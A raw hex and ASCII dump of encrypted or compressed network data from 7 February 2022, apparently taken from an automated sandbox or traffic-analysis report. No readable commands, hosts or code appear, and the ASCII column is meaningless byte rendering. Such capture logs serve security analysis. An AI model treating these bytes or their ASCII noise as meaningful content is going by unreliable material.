d9 06 db b9 1a de c2 f8 f8 9f 56 85 0d c9 21 c4 b0 c0 e8 3e 11 50 c6 d4 20 4c 69 2b e9 07 34 30 c6 41 bf f1 0e 20 81 22 da 38 c8 4a 7a 9f
                                                          Data Ascii: z]6"hK.j_a/aO^%EqQ!?"wA9VC&QQjGX9:n03GWB!8Z*uHzrbEp`o7y$/$E-}k<]s++e9==~z\$sfD*CV!>P Li+40A "8Jz
                                                          2022-02-07 11:03:22 UTC213INData Raw: d9 f5 67 89 05 b5 52 2f 2e 2a e6 4d ff 43 1d 48 8c 0c 51 3c 57 e2 28 05 51 c7 cd 28 94 8f 2c 37 83 a9 7e bb 36 43 a8 9c 2e 6f 85 a5 fe 59 e8 f5 0f b1 70 32 0e 67 6e dd 84 7c 70 b7 62 b3 d3 be b7 99 ff bf e3 80 c7 11 0f 0d 73 a8 2d ac 38 40 3f ca 9f e9 e5 75 75 ef f0 71 ef 54 fc 76 f4 2f db a4 ed d4 0d 5c 67 6a a7 2b e1 56 b8 73 56 12 63 32 5e 68 0d cf 82 bd ff e8 e8 1d 65 d4 bc 0d 55 23 d9 e5 4f d0 6b 40 e3 38 1a 60 21 83 9b 40 35 bc a0 98 0a e7 38 11 89 32 63 dc e9 84 94 9e 28 00 83 e6 0f 83 b5 3a 28 10 0f aa 46 16 98 68 8b 38 6d 87 e7 3b 4f c3 cd 3a 27 e6 bd 83 e0 71 1c 50 97 05 6f 77 e7 54 a7 86 35 1d 52 e6 1c 7b 54 48 1d b7 ab 14 89 a5 3b 5e fe 06 62 af 93 a7 f3 a7 8c b6 d1 fc cd 3f d9 58 e0 bd f0 a2 3f 4c 5c d6 49 50 a6 10 a3 3e f2 a0 df 1c 12 e4 d6
                                                          Data Ascii: gR/.*MCHQ<W(Q(,7~6C.oYp2gn|pbs-8@?uuqTv/\gj+VsVc2^heU#Ok@8`!@582c(:(Fh8m;O:'qPowT5R{TH;^b?X?L\IP>
                                                          2022-02-07 11:03:22 UTC214INData Raw: 68 ac 59 2e 22 44 92 37 7f 63 52 ed 6b 03 05 b8 ab 8d 96 19 08 7b e0 2d 8a 2d 68 10 4d c2 33 05 bf b4 e3 7e 42 f7 c3 f0 a3 7b cc 02 a2 ae 10 4a 31 2d d6 16 1e e8 fd 1d 33 50 d0 ec ac 3a 0b de 00 6a bc 81 07 29 29 39 e1 a5 77 70 9b bb 7a b2 8b fc c4 0c cc 0f e8 8a 6f 5c 90 6a a4 12 b9 bd 62 2c 5a bd 5c 81 d6 ed 74 30 c4 8f 02 ed f4 3e fa e2 bf ef 49 f9 bc b4 ac 07 d5 05 ff 78 d3 66 3d f3 ec 41 45 c9 22 26 93 63 c4 11 f9 6e 49 2c f9 6a e7 df 0b dd 2b 9c 44 b0 39 1d 08 15 b1 bd 28 a3 a8 b8 01 e8 31 4a ce 14 fc c4 d1 17 5d 5a fa 0a f2 e4 48 59 88 20 d5 9f 0d 38 24 10 ef 11 36 2c f7 93 0d f6 8c 80 1d 5d 7f 3e 4a 17 e4 45 4d 6e 6f 7f db fc 94 f4 46 17 bb 52 05 af ef eb b8 c6 b1 40 4d 81 ff 6e 86 37 d5 81 ef 35 1f 75 4e 37 2c cd 94 fa 4a 0a 71 d3 a0 d9 79 62 b0
                                                          Data Ascii: hY."D7cRk{--hM3~B{J1-3P:j))9wpzo\jb,Z\t0>Ixf=AE"&cnI,j+D9(1J]ZHY 8$6,]>JEMnoFR@Mn75uN7,Jqyb
                                                          2022-02-07 11:03:22 UTC215INData Raw: 94 50 6f 34 af 06 56 f4 d5 20 ae c8 91 76 2b 29 c9 58 7c df d7 05 00 97 47 b3 e5 c3 7c 37 99 fc 5b 9d 9c 8d e9 f2 10 12 bd b2 23 3c a1 06 63 d7 f0 fe 28 db 02 3c d1 8c b7 94 26 6e 13 af 9e cc 42 23 6d 6f 7b 07 5e 45 ce 1e 18 85 d9 7b a4 96 48 4f 90 ef 14 04 57 13 8e 37 b8 c7 e0 41 81 e7 7e 3f db e6 e3 bb 2f 1b 59 d8 d6 10 f2 bc 76 ba 04 97 cd 3c 64 b8 fc 97 51 37 26 0f 89 74 56 e9 50 d5 05 bb a7 45 1c 22 d8 db be a4 c5 56 8d a4 b8 fa 28 d0 97 d6 c2 df 6f bf 7c 18 95 39 ef 83 3f 41 86 f8 34 c2 f2 a3 8a 44 f1 e9 38 41 a1 d5 30 f8 a2 be 7a 49 fc 3d 66 89 f7 7d 97 41 f3 47 0a 65 6a b9 40 c5 87 56 6c 08 04 37 67 40 3e 65 10 52 33 dd 40 be 39 ef 85 e3 58 0e 38 79 68 6e 3c 0b ea aa 71 76 f7 ab c0 25 9e 87 1b bd 2f 72 ad 27 92 7c ed 6b 0a 1a fe 6c 72 73 b3 d1 a2
                                                          Data Ascii: Po4V v+)X|G|7[#<c(<&nB#mo{^E{HOW7A~?/Yv<dQ7&tVPE"V(o|9?A4D8A0zI=f}AGej@Vl7g@>eR3@9X8yhn<qv%/r'|klrs
                                                          2022-02-07 11:03:22 UTC217INData Raw: 23 64 aa bd ad 2b 3c 57 88 e5 32 d5 8b 52 f5 2e 9f 0b df ea 89 45 b5 dd c3 3d 6c f2 48 e3 52 7c de b6 1b 50 0e b7 02 32 be 65 1d db b5 af e3 d8 38 4f a7 7e 71 69 c9 e9 3e 72 6f fc c0 ac d9 e7 99 5d 03 2e a0 4e f2 4c 11 5b f2 83 58 f4 6a ed e5 12 eb 1f c7 5d e6 d8 39 e7 9a 14 55 41 dd f4 92 dd 49 65 b8 6f ed ea fe fb 82 11 29 41 b0 f8 e1 d6 28 66 48 5c d2 7d c5 35 0f d0 fb 1e a7 3d 78 24 c2 78 7b 3e 0e 04 09 67 97 65 5b 6b f7 d1 d6 d3 5e ac 28 21 ba 49 72 98 f9 db aa d1 a8 b2 01 1b 53 95 6f 33 93 58 98 b3 a4 a0 d1 4e f4 92 60 3f ed 84 fa df a0 e2 11 3f c8 c3 4c 67 77 3f 5d a8 63 a3 ed 99 20 bc fb a8 ff 09 e1 8d a0 65 bb cc ad 8c 62 54 c1 25 6f af 98 27 06 ea 3f 79 57 de 1c d0 a8 c3 c5 db 13 77 99 44 8e 0d d3 4e 26 64 9f f7 fa 67 d2 cb cf 57 87 35 83 91 7f
                                                          Data Ascii: #d+<W2R.E=lHR|P2e8O~qi>ro].NL[Xj]9UAIeo)A(fH\}5=x$x{>ge[k^(!IrSo3XN`??Lgw?]c ebT%o'?yWwDN&dgW5
                                                          2022-02-07 11:03:22 UTC218INData Raw: b1 39 93 03 db db 05 d7 83 18 17 3b 15 1e 50 cc 84 49 a0 32 bd c4 82 e5 68 08 af 4f d2 64 04 f4 ce 05 34 df d2 10 e5 9d 7d e3 e6 55 4c 68 09 b0 55 5e c2 c4 3e 34 52 3a ae 1c 57 5d c7 7d 24 db 3a 0a 34 74 bf bf b3 02 7c ec c7 60 b0 8f 4c 96 91 11 33 46 36 f8 50 b0 63 e3 e9 f2 18 4b 0a 94 e3 82 fa 14 88 8f 2e c1 66 06 34 37 5c 45 1c e1 b5 40 9a 46 68 16 45 e1 6d ea 68 d8 22 ce 16 42 1d 1c 0b 64 91 bd a0 65 5e ab 70 c2 bf 09 ea 77 3d 17 2b c1 f1 7d b9 de af 8b 9d 9f 64 66 8c 9a 64 02 35 dd 2a 3d d5 80 9a 89 db d3 99 31 a7 87 44 b6 23 e1 72 4d 47 ca c7 48 3b cf b1 70 3d ee 09 c2 ef 07 48 47 6b 05 2f 2a 2d d9 c0 96 bd c4 bf a9 cc 16 76 d4 0d f4 f9 22 03 33 f9 6e 6d 21 ae d0 5d 13 f0 c6 d3 92 9d 17 0e 01 a4 6b 3a d3 c4 59 e1 83 49 ec c6 d5 ba 71 d2 fa ed 20 35
                                                          Data Ascii: 9;PI2hOd4}ULhU^>4R:W]}$:4t|`L3F6PcK.f47\E@FhEmh"Bde^pw=+}dfd5*=1D#rMGH;p=HGk/*-v"3nm!]k:YIq 5
                                                          2022-02-07 11:03:22 UTC219INData Raw: 90 19 dd 30 c7 12 53 b0 73 ec f0 b1 1c 02 a2 3b 36 47 51 fb 4a ba ad 1f 2d 9a d7 20 29 47 e5 14 77 b3 4a b9 37 34 7a 7d ca 1e c5 17 79 35 14 c8 ba 99 1e 1e 17 00 55 6b 5e 0f 3e 3c 87 4a 47 29 5c 32 74 dc fc 73 3b fe c0 21 97 5f bc 69 01 55 07 bc 16 e7 b3 67 99 e6 1b d4 ad 45 f6 6e d7 37 02 96 16 45 ef 91 cb d4 de c3 de 81 3f 25 87 8f aa 36 29 13 51 77 8e 4a 48 01 fc d5 3a 53 54 b0 52 49 c8 19 51 7f c4 59 50 38 1d 9a 75 73 14 7f 4f 1a da 6b 9a 06 2f eb ca 3f e2 e4 32 41 af 03 3d e6 7a 41 0f 14 7f ab e1 5f 80 0b c9 98 fc 8d 6f 64 05 d3 8e 48 db 49 74 89 a8 b8 76 e4 4a 58 bf 90 32 11 08 73 1d f2 ff 92 7d 19 25 58 c7 a1 92 1f 6a 99 58 58 0c 96 ea 26 63 82 55 a6 02 7d 47 55 63 4c 08 0d 1b b2 5b 46 a6 a7 b3 a7 a0 9a 46 45 e7 36 eb 72 d5 98 3b 40 a1 61 dc 35 64
                                                          Data Ascii: 0Ss;6GQJ- )GwJ74z}y5Uk^><JG)\2ts;!_iUgEn7E?%6)QwJH:STRIQYP8usOk/?2A=zA_odHItvJX2s}%XjXX&cU}GUcL[FFE6r;@a5d
                                                          2022-02-07 11:03:22 UTC221INData Raw: 14 2e e8 1c b0 b7 66 3c c0 ea 9c 38 5e eb 47 5e e0 75 29 2a 3c 82 17 df f8 68 e3 4e ca 49 b2 c5 c1 e7 88 9b b6 c8 68 e9 7d 45 36 f8 c6 0f d4 01 a2 ec d1 70 a7 0e a9 2a 18 a4 48 52 44 77 48 bd 5d d4 68 8a 0e 80 2b 68 55 3c b5 4b d1 32 10 e1 c2 a6 c5 7e 33 47 93 f3 cc 54 10 f5 45 ca d2 74 8d 9c 0b 90 28 ce ce bd 96 39 c3 c9 d8 b5 c1 05 18 69 2f f2 d7 90 4f 61 72 9b f0 25 2b 08 86 31 f2 eb e4 fb 3c 0a 41 2b 9b 70 d8 5c bd a0 a5 45 47 ca 6d aa fc f3 00 76 c0 a2 f3 8a 09 20 e2 ba 45 20 eb eb 4e 7b 75 78 12 5e 9f 26 a5 d4 fa 46 ce ec d7 90 6a 3a 83 ee 22 93 37 66 14 1e de 15 d2 88 6c 35 01 24 08 d0 8e 70 3b 73 fd bc ee 69 e4 4c d2 c8 66 b3 a6 54 ff 4e 88 5c 1a 98 8a 7a fb b0 82 c2 38 40 4f 38 cc 9a 75 33 53 fe 9c 69 d9 35 10 48 e4 7b 80 61 60 60 4e b5 d3 14 6e
                                                          Data Ascii: .f<8^G^u)*<hNIh}E6p*HRDwH]h+hU<K2~3GTEt(9i/Oar%+1<A+p\EGmv E N{ux^&Fj:"7fl5$p;siLfTN\z8@O8u3Si5H{a``Nn
                                                          2022-02-07 11:03:22 UTC222INData Raw: 00 df 24 44 29 be 78 7a 21 0f 70 f7 0b c1 9f 22 a2 84 af 24 1e 29 5b eb 55 d5 11 fc de 87 fa 4b 72 6d 46 12 d6 27 2a 1e 95 a7 9c c7 64 2a 4f 97 63 5e 67 12 c1 4a ec 0e 1b 94 05 76 93 be 41 67 6e 7e a6 1d 8c b6 5b 1d e4 8c a0 83 cf b4 69 10 50 08 4b db a1 54 87 f2 86 33 5a 12 26 81 9b 4c 54 4b 11 5c e3 c7 a5 b6 84 1a 92 14 7d 0a 89 c0 b1 a6 b3 c3 6f aa d3 aa 95 d2 71 dc 82 df 76 92 3d be 8c ab c0 f0 71 a4 9f 98 26 a1 de a9 b6 c6 7a 64 f2 15 a9 5d b1 b1 67 13 c9 5d 97 b6 ff 23 29 17 ab ad 82 ab ca 40 6e b0 36 2f 64 4c 76 c5 4d 30 e3 6e 3e 96 e7 ec 9c dc 8b 89 96 86 eb 4a 08 7f 01 a7 59 8a ad ac 50 60 70 10 1a 73 53 7e 41 1c bf f8 bc 76 6a 6b 6c 84 0a 28 6d 18 71 2a 85 70 2e 22 72 98 69 57 3d 70 46 32 17 da 4c 14 1f b4 86 be 1f 47 1e 9f ee 02 65 cb c3 81 75
                                                          Data Ascii: $D)xz!p"$)[UKrmF'*d*Oc^gJvAgn~[iPKT3Z&LTK\}oqv=q&zd]g]#)@n6/dLvM0n>JYP`psS~Avjkl(mq*p."riW=pF2LGeu
                                                          2022-02-07 11:03:22 UTC223INData Raw: 7d 12 a6 96 79 1c 9c 6c 2e 4c 92 18 c1 27 be 6a b2 4e a0 f1 84 70 ac 92 e1 4f dd 6d 3d 20 7c d8 6c 5b c5 4a b7 7c 17 f2 12 7e 50 99 57 6e 0a d2 ac 22 f9 b8 7d 83 9c d2 58 42 fc 5b f0 69 62 0e ea a4 db 59 a4 99 a2 6b 19 4f 52 5a e0 3e 32 38 a1 1f 38 80 d2 cf 30 bc 9e 37 5a b7 f6 dc 8b 4f f5 55 01 97 a2 58 58 59 7e f8 a1 9b 86 94 33 6a cc e6 05 8c 64 33 88 ce ac 5d 1f 76 f7 81 26 d8 e9 fe d8 64 58 c3 6d 82 29 26 42 7b 3d 98 1c d7 db 72 3b 85 91 f9 d9 94 4c c6 29 1f 15 e0 5d a3 c8 20 50 17 7f 20 42 a8 f6 23 dd 36 59 a7 d1 5a 0d 5b ed f2 80 37 17 80 40 10 41 7c bd a8 66 c9 0e 03 b4 79 7b 2c b9 75 21 1b b5 65 84 85 3a c2 64 21 7d 8d e7 f0 13 aa c8 61 a4 80 30 d5 51 02 59 f1 1b c4 8d 20 a6 d0 d9 4e b4 da 78 95 b6 75 9f ff 50 6c 6b bf 3a a7 14 d1 5a 97 c7 76 59
                                                          Data Ascii: }yl.L'jNpOm= |l[J|~PWn"}XB[ibYkORZ>28807ZOUXXY~3jd3]v&dXm)&B{=r;L)] P B#6YZ[7@A|fy{,u!e:d!}a0QY NxuPlk:ZvY
                                                          2022-02-07 11:03:22 UTC225INData Raw: 94 98 8a f3 00 8d 19 0b fe 84 24 e4 ec 62 5b 8e 44 c6 51 b0 1e 7c be 7b 48 8b 57 2f 62 ce 87 e6 7d 69 8c fa 94 07 4d 46 a8 0f 99 a9 18 b6 72 5f 02 1d 4b d7 05 a4 64 ae 99 20 11 03 44 4d 23 9b 6c 9f c8 77 7f 06 81 75 92 b5 ee e9 a6 0f 4e 92 76 93 60 59 10 5c 9e 15 27 8f 89 fc 14 b6 ba 0c 11 e0 99 c7 58 ea a6 d7 c4 c5 df 31 46 d3 4f 98 b1 29 4b 3b ea 6e d1 65 f4 fa 70 d9 3b 70 ee 53 a2 3f 18 f5 6a a9 81 1a 4f 05 8d bf ff 5d 09 a7 1d 91 1d 7e 94 d3 e4 03 e3 44 0d e2 3b da 4d 53 6e a1 aa 4e d9 b5 10 1b e9 77 22 29 ca 82 2f 4a 21 6c 62 d7 1f 83 d7 71 af dc 2b 83 34 8b ce 36 79 56 06 c0 52 bf 79 85 35 ff 4f b4 0f 7b d2 6c 06 f5 4c 08 a1 96 20 a7 aa 7f 4b f9 f6 d2 61 1c 22 4b 1d 25 80 87 8a ee da e8 f9 8d 19 f9 54 20 89 0f d2 70 6e 6c b1 33 54 af af 0d 75 1d 80
                                                          Data Ascii: $b[DQ|{HW/b}iMFr_Kd DM#lwuNv`Y\'X1FO)K;nep;pS?jO]~D;MSnNw")/J!lbq+46yVRy5O{lL Ka"K%T pnl3Tu
                                                          2022-02-07 11:03:22 UTC226INData Raw: 2c f4 4c 15 f9 51 34 56 6e c7 38 5c d1 8f fc 30 65 9d 6f c7 fc 2e 61 e3 e7 33 1b 67 c5 47 6c 05 5c 12 c9 68 c7 92 5e 3d d7 cb be 40 79 8a 18 af 85 d6 95 16 8c e1 1f 15 b7 0e a4 a5 23 a5 78 06 50 d3 cf 08 c2 30 8c a2 6c f9 02 e9 72 71 7d e5 cc c8 2e 5c b2 c4 3f 4a 4b ca c4 69 0a 70 fb 3b 0f 50 e2 5c 34 9b bf 8a 3a ea 14 9c 34 2e 6b ea dd c4 f0 34 3e 9b d4 95 0b 08 df b7 00 c2 24 7f 7d e4 8b ff 91 5d 38 c1 59 87 a9 8f c6 05 a7 ca 63 88 19 4a a8 46 7e 6f 4c 8d ed 64 94 06 bc d4 77 d5 ea ac 89 45 74 35 cd 38 a3 a4 fc ec 5c 35 07 86 2a f3 62 0c 85 a7 9d c3 8b 02 ef ac b2 94 0e 86 1a d8 1c 1c ad 6b 59 32 97 3e e2 8f ea fd bb 5d 59 b0 04 97 22 24 a2 81 ca 04 18 7a 42 3d d0 2c 85 8d 5a 03 4e 27 7e 65 42 f5 ad 1f 47 04 a0 62 ac 60 92 03 92 9e 55 95 37 5b bb 6a 12
                                                          Data Ascii: ,LQ4Vn8\0eo.a3gGl\h^=@y#xP0lrq}.\?JKip;P\4:4.k4>$}]8YcJF~oLdwEt58\5*bkY2>]Y"$zB=,ZN'~eBGb`U7[j
                                                          2022-02-07 11:03:22 UTC227INData Raw: aa 3d 33 24 0c a5 29 f4 85 8a 9b 52 30 df 24 de b1 4e 40 02 f4 60 63 f1 0d ad a1 e5 d1 62 45 f0 de 24 0b 18 c8 4b 62 e5 af ed ec f7 47 36 07 bc c7 67 30 e4 d8 74 4e 7a 23 ab cb 62 4d 28 63 8c 8a 2f 81 de 4d 19 eb 26 ef 0a 57 21 e6 19 b2 2e 19 f8 3c fb a2 01 1d 78 84 a0 8d c1 8b 46 7c 51 e3 b8 c6 40 73 c7 0c 0d d0 cb ac 32 12 80 2f c7 5c ad d7 1e e8 88 1b 2d 75 96 b7 84 91 a9 6c 8a ff c8 6a 16 65 67 e5 a3 c7 1e b7 6a cc b3 ed 21 e2 5a 77 d8 4b 8a cf fa 8e 81 8f 32 ea e9 10 9d 72 86 f7 11 93 ad 3d e0 6a 25 19 67 35 b8 74 e1 e7 44 89 1d d0 37 6f 33 6c a5 1b e7 30 02 3b bf 87 a4 fe d8 b1 22 4e c3 73 c2 25 f2 44 dc d4 af 5d ad 93 c2 51 3f a0 b6 8c 97 50 fe 53 f4 e1 d7 af 35 39 21 2a b8 95 b4 dd f3 dc ea 7d 18 3a 95 c9 3f d2 66 97 70 eb fb e5 d8 f5 51 cd 2d a8
                                                          Data Ascii: =3$)R0$N@`cbE$KbG6g0tNz#bM(c/M&W!.<xF|Q@s2/\-uljegj!ZwK2r=j%g5tD7o3l0;"Ns%D]Q?PS59!*}:?fpQ-
                                                          2022-02-07 11:03:22 UTC229INData Raw: 1e d6 d9 7b 84 48 c5 b8 26 a3 df af 51 1e fe ae 53 46 df fc b1 2f 76 79 af 87 cc dc c1 32 a2 ff ca 24 4d 18 42 38 3f 68 b7 f6 5a 4c 14 d6 ec c3 38 e6 1c 15 3a 5c f9 14 9a f8 4d 7b 62 5d ac 6e 8a 7f a2 b0 ca 02 73 1c 71 f3 1d 98 f5 01 a9 a0 29 7f fd cd 06 9c ed 6c 4f 14 c6 53 0b 8a d4 51 f8 41 bd 4a d6 9a 33 dc f9 0f d8 48 96 a2 04 f3 10 6b ee 2e 1b fa 72 ce c4 ce dd 1d 23 bd 15 8b 3d a6 3c fe 2e 8c 6e 1e e5 c1 be ee ce c9 8e e5 e5 b9 a6 9b af 34 90 23 35 95 f1 5c 2c f4 79 46 a6 77 2c 83 8f 24 df d1 62 12 62 4b 0c 68 d3 cb cf fe 9f 6c cb eb 9f fe 10 c3 04 df bf 9a bb 4a 85 ab c0 ac 92 02 e7 37 77 c9 bb 75 bd 90 38 7b 0a a1 2d c8 13 21 13 03 40 85 08 2c 8e 0c 9e 1b 6c a0 c3 d8 1f 70 e2 2d 04 86 be e9 c4 db 5f db 03 a6 51 91 27 4d 69 4f 1e 60 16 e4 d9 ed b7
                                                          Data Ascii: {H&QSF/vy2$MB8?hZL8:\M{b]nsq)lOSQAJ3Hk.r#=<.n4#5\,yFw,$bbKhlJ7wu8{-!@,lp-_Q'MiO`
                                                          2022-02-07 11:03:22 UTC233INData Raw: fb cd c9 e5 c2 c6 c5 c1 c3 c2 d0 1f cf bf bd bc b1 9a 76 0d 1e 8f 95 ea 18 f8 c2 2e 0a bc a1 b3 8c f4 ec 8f a7 a6 a5 06 a3 a2 a1 53 1e 9f 9d b2 98 9a 99 3c 95 96 95 07 92 92 91 e3 0f 8f 8d 89 8b 8a 89 87 84 86 85 0c 80 82 81 31 00 80 82 4b 7a 7a 79 78 73 76 75 82 72 72 71 9a ed 6f 6d 37 6b 6a 69 9a 65 66 65 10 67 62 61 47 dd 5f 5d 89 58 5a 59 1d 57 56 55 05 50 52 51 f5 cb 4f 4d 11 49 4a 49 05 43 46 45 ea 42 42 41 55 bf 3f 3d f1 3a 3a 39 87 35 36 35 94 30 32 31 fc ab 2f 2d 36 2f 2a 29 9d 27 26 25 72 22 22 21 9c 9d 1f 1d 6f 19 1a 19 89 15 16 15 a2 10 12 11 9a 8e 0f 0d c4 0b 0a 09 30 68 02 05 04 12 04 1e f2 6e f9 e2 f1 6e f2 e6 f5 62 97 6b e5 f5 ed ff 1e 69 f0 e3 79 e3 f5 e7 7d 86 78 f4 e2 fc ed f0 19 40 d0 48 d4 c4 d5 4c b9 49 c7 d9 f4 a5 1b ee f8 15 ef d7
                                                          Data Ascii: v.S<1Kzzyxsvurrqom7kjiefegbaG_]XZYWVUPRQOMIJICFEBBAU?=::9565021/-6/*)'&%r""!o0hnnbkiy}x@HLI
                                                          2022-02-07 11:03:22 UTC237INData Raw: 66 1f 25 7b a0 bc 40 40 3d 22 22 5f 30 2b 39 c9 23 34 34 33 29 33 ef 50 d0 d2 13 74 3a 29 39 20 06 2f 37 4e e4 7b ff f2 c4 13 57 7a 22 a0 e5 e8 e9 6b 15 13 12 15 ed aa 18 55 1c 0b 9b 77 09 07 06 01 06 26 15 59 ef 7f 6e e3 9e 9b 84 f8 f8 f7 f2 f7 d1 e4 aa e1 0f fe f0 fd 8e 8b 94 e8 e8 e7 e2 e7 c1 f4 ba f1 1f ce c0 c5 be bb d6 c8 df f7 81 f1 4a 39 88 f1 d7 4e 3c fe ad f3 a0 34 37 38 d7 c2 e4 59 63 26 f1 65 9f a8 cc 9c 19 d8 80 e0 4b 4a 4b a2 b5 91 74 93 9c 84 f6 8b 9c ac c5 6e c7 9d e0 5e 5d 5e 21 1e 9f 9d 98 99 93 8f 66 8b 97 95 94 88 ba a1 6f 0f 85 84 9a 28 8b 89 88 9c 8d 94 83 a3 88 3b 75 83 25 5d f0 bc 5e b7 19 4f 60 88 8b 8c 75 5b 9c df 67 6d a3 69 6a 69 6e 67 66 74 66 43 2f 7a 1d 2c 05 7d 52 a7 0a 96 39 47 56 75 81 ba aa 76 8f ee 0a 45 77 2a 6f 5a 4f
                                                          Data Ascii: f%{@@=""_0+9#443)3Pt:)9 /7N{Wz"kUw&YnJ9N<478Yc&eKJKtn^]^!fo(;u%]^O`u[gmijingftfC/z,}R9GVuvEw*oZO
                                                          2022-02-07 11:03:22 UTC238INData Raw: 38 38 37 ac 37 34 33 03 32 cf af af 2f 2c 2b a4 2a 28 27 28 21 24 23 05 23 df 9f 8c 1c 1c 1b 26 18 18 17 13 15 14 13 1d 12 ef 8f 5d 0c 0c 0b ae 08 08 07 ea 06 04 03 be 00 ff 7f f2 ff fc fb 9e fb f8 f7 5e f6 f4 f3 04 f3 0f 6f 58 ed ec eb 86 e8 e8 e7 af e7 e4 e3 8f e1 1f 5f ff dd dc db 71 db d8 d7 1c d7 d4 d3 ff d5 2f 4f 98 cd cc cb f2 e1 cc c7 c6 d4 c0 a9 c4 af 0d 37 9f f6 f1 e9 d3 9c 93 b1 96 93 43 96 d7 94 69 17 ec 52 53 54 bb af b3 b6 a0 be 31 ab b9 34 3e 81 8e 9b 80 8a 9c 85 0d 9f 8a 00 f5 0d 83 97 72 1e 89 90 19 83 97 1c e9 19 97 89 a4 bc bf d9 d9 a5 5f 26 1e b0 56 18 40 7b 89 8a 8b 62 74 60 86 e8 7e 69 7d 62 32 fc f6 47 ff 5a 63 70 5a 97 61 20 a0 4c 56 4c 02 4a 52 46 5a 75 6f f8 94 47 f5 ef f5 b1 52 a0 2b 71 95 b9 b9 ba 55 45 5d 4c ae b9 20 30 a9 33
                                                          Data Ascii: 8877432/,+*('(!$##&]^oX_q/O7CiRST14>r_&V@{bt`~i}b2GZcpZa LVLJRFZuoGR+qUE]L 03
                                                          2022-02-07 11:03:22 UTC242INData Raw: ee ba 65 e0 15 0f 67 41 51 d7 cb 91 1d 59 59 5a a6 d8 b6 a1 5f 1b 99 12 9e 9b 9a 9b b0 b5 96 95 92 95 85 c9 65 2f 85 55 73 ae b2 1f 76 78 79 8c a4 a7 47 0f d9 a5 5f da a5 65 66 18 40 f3 88 8a 8b 71 09 7c 8f ef 6b 6b e3 69 6a 69 6a 4f 44 65 64 65 60 1a 91 df 5f 59 5a d4 58 59 58 55 7e 77 54 53 54 58 8f f7 e2 94 9a 11 6a 63 04 a8 0b 24 7c 13 bc be 40 a9 35 34 1c f3 ca ae 97 6d 16 2e da 1b 94 50 f7 93 d1 d2 d3 29 51 26 28 27 22 23 ab 21 22 21 dd b7 3d 1d 1c 1d 13 39 99 96 0d 35 4e 33 13 ac 8c b0 6e 35 15 f5 f5 f6 0a 7c 16 05 04 07 04 8e fd 7f ff ff d4 d9 fa f9 fe f1 e1 ad fe fa d2 d4 39 b6 92 b7 cc 5c 71 b6 ce 86 de 17 19 1c 1d e6 1d 24 c3 dd dc df ef d1 f8 a9 05 ee f1 f6 f9 d7 0f d2 36 c0 c5 ee ec f1 1d 3a 39 3a d2 c9 cb e1 ca e3 4d 82 e6 9b 41 ca cf 95 d7
                                                          Data Ascii: egAQYYZ_e/UsvxyG_ef@q|kkijijODede`_YZXYXU~wTSTXjc$|@54m.P)Q&('"#!"!=95N3n5|9\q$6:9:MA
                                                          2022-02-07 11:03:22 UTC246INData Raw: af 2b 72 2e 50 0f 29 28 23 39 3a 7b 41 26 3f dd e4 3a 1d 1c 1f 43 06 07 48 75 4d 3e 13 12 11 fc bf 09 0d 16 0b 0a 09 09 07 06 14 06 78 21 01 ff 7b fd f9 f9 d3 c6 f9 f8 f1 79 fd f4 f3 f0 f2 27 2d ef ed ea c1 ea e9 fb d7 e0 e5 f8 e3 e2 e1 1e 5f df cc de a0 f9 d9 d8 d3 d4 d1 d1 fb ee d1 2f 49 40 c5 cc cb c8 ca c6 c3 ee 86 c4 c3 c4 eb 2c 0f bb bd ad bb ba b9 b9 b7 b6 a4 b6 93 b2 b2 4f 2f 22 af ac ab a8 d4 8f a7 a6 a1 8e a3 a2 a1 4c 2f 9b 9d ed 9b 9a 99 92 97 96 84 82 99 b2 4a 20 aa 51 ad df 48 27 0a e9 a2 8d 9e da c6 87 81 7f ff a7 82 83 84 3c 79 78 77 74 75 74 73 63 71 8f ef 42 6d 6c 6b 41 2d 6f 47 81 33 93 5f 38 41 87 78 7b b2 3d 70 96 5b 23 70 56 55 50 55 dd 53 af cf 4d 65 6e 4b 4a 4f 4e 50 1e 4f 64 e3 9b 41 19 94 8f 3b 1c 3b 39 39 38 18 3e 15 15 b9 9a e9
                                                          Data Ascii: +r.P)(#9:{A&?:CHuM>x!{y'-_/I@,O/"L/J QH'<yxwtutscqBmlkA-oG3_8Ax{=p[#pVUPUSMenKJONPOdA;;998>
                                                          2022-02-07 11:03:22 UTC250INData Raw: aa a9 a8 a5 a6 a5 a4 85 a2 a1 5f c3 60 62 63 b0 be e7 ad 97 96 91 9e 94 b2 26 c9 de f9 d7 ac 8b 30 a6 c3 e6 ad 4f 83 a3 ea 1e 34 7d 25 5d b5 1b 59 9b 19 5c cd 73 5e 73 72 71 9c df 6c 6d 6b 6b 6a 69 69 67 66 74 66 4b 37 61 9f d5 75 5d 4f 6b 59 59 15 57 56 55 48 53 52 40 af ef 0c db 4f b6 6a b3 37 6b a6 24 61 48 58 1f fa bb 3f 3d 3c e7 c5 c6 c7 35 36 35 34 15 32 31 cf b8 2f 2d 2c 00 0e 01 5b 27 26 23 2e 24 02 e1 7d f6 8e 47 3c 2a 3e 8b 03 76 3d df 13 33 0c 55 4d 57 55 2d 2a 05 12 1f 69 2c bd 03 2e 03 02 01 ec 4f fb fd 9c fb fa f9 f9 f7 f6 e4 ee e8 da 7a 0f 6f e9 6d da eb ea ed c8 5d e7 75 d4 c3 af b1 d8 50 be f8 d6 c2 84 9c db d7 d6 d5 e7 d3 d2 d1 2d 4f cf cd 2c 34 35 36 e3 f6 d2 3b c2 95 c2 c1 35 4c 17 bd bc bd 3a 8e b8 b7 b2 a1 4a b5 e5 b1 4f 25 dc 09 ac
                                                          Data Ascii: _`bc&0O4}%]Y\s^srqlmkkjiigftfK7au]OkYYWVUHSR@Oj7k$aHX?=<565421/-,['&#.$}G<*>v=3UMWU-*i,.Ozom]uP-O,456;5L:JO%
